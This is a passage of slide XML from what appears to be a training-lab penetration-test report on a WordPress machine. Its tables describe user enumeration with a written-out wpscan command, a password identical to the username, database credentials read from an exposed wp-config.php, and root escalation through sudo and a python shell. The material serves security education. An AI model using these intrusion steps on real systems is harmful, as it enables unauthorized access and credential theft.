                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000" b="1"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000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000" b="1"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000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000" b="1"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307350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Users Enumeration</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4D5156"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:schemeClr val="lt1"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="5F6368"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:schemeClr val="lt1"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4D5156"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:schemeClr val="lt1"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>-2009-2335</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1" i="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr sz="1750" b="1" i="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk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4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="4000" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="4000" u="none" strike="noStrike" cap="none"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chemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Wpscan used to enumerate users (WordPress)</a:t>
                      </a:r>
                      <a:endParaRPr sz="40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4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2550">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Cmd used:</a:t>
                      </a:r>
                      <a:endParaRPr sz="48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4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2550">
                          <a:solidFill>
                            <a:srgbClr val="1D1C1D"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>wpscan -url </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2550">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:uFill>
                            <a:noFill/>
                          </a:uFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>http://192.168.1.110/wordpress</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2550">
                          <a:solidFill>
                            <a:srgbClr val="1D1C1D"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> -e u</a:t>
                      </a:r>
                      <a:endParaRPr sz="2550">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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chemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Target IP and services running achieved. Users found Michael and Steve.</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000"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2125200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak Password Requirements</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="6C1D1F"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CWE-521</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1" i="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr sz="1750" b="1" i="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk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4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="40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Clr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Michael’s password being the same as his username (michael).</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000">
                        <a:solidFill>
                          <a:schemeClr val="dk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4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="400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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Flag 1 and 2 were found  at</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>service.html and www respectively.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2125200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>WordPress Config File Exposed</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1" i="1" u="sng">
                          <a:solidFill>
                            <a:srgbClr val="3377CC"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId5">
                            <a:extLst>
                              <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                                <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                              </a:ext>
                            </a:extLst>
                          </a:hlinkClick>
                        </a:rPr>
                        <a:t>CVE-2021-24692</a:t>
                      </a:r>
                      <a:endParaRPr sz="1750" b="1" i="1">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000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Navigating at michael dir: /var/www/html/wordpress/wp-config.php</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000" u="none" strike="noStrike" cap="none">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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike" cap="none" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>DB name(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>wordpress</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike" cap="none" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>), user(root), password(R@v3nSecurity), host(local host) were found.</a:t>
                      </a:r>
                      <a:endParaRPr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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2377" name="Google Shape;2377;p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t>Critical Vulnerabilities: Target 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2378" name="Google Shape;2378;p6"/>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7</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2379" name="Google Shape;2379;p6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295399"/>
            <a:ext cx="22942800" cy="10848295"/>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a:t>Our assessment uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1"/>
              <a:t>Target 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2380" name="Google Shape;2380;p6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1181100" y="3268325"/>
          <a:ext cx="21991475" cy="2926020"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{D2EE18AC-DD6A-4FD0-9572-6E9059F1DDDE}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7277100">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7382500">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789325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000" b="1"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000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000" b="1"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000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000" b="1"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003750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="4000" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Privilege  Escalation</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1750" b="1" i="1">
                          <a:solidFill>
                            <a:srgbClr val="5A5A5A"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:schemeClr val="lt1"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2018-1000030</a:t>
                      </a:r>
                      <a:endParaRPr sz="1750" b="1" i="1"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3200"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Check for exact command that steven is authorized to use (sudo –l).</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="3200"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Using python shell spawning command.</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200" u="none" strike="noStrike" cap="none">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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Got fully interactive terminal shell. </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Then escalate root user through</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Steven’s account (python) at raven . </a:t>
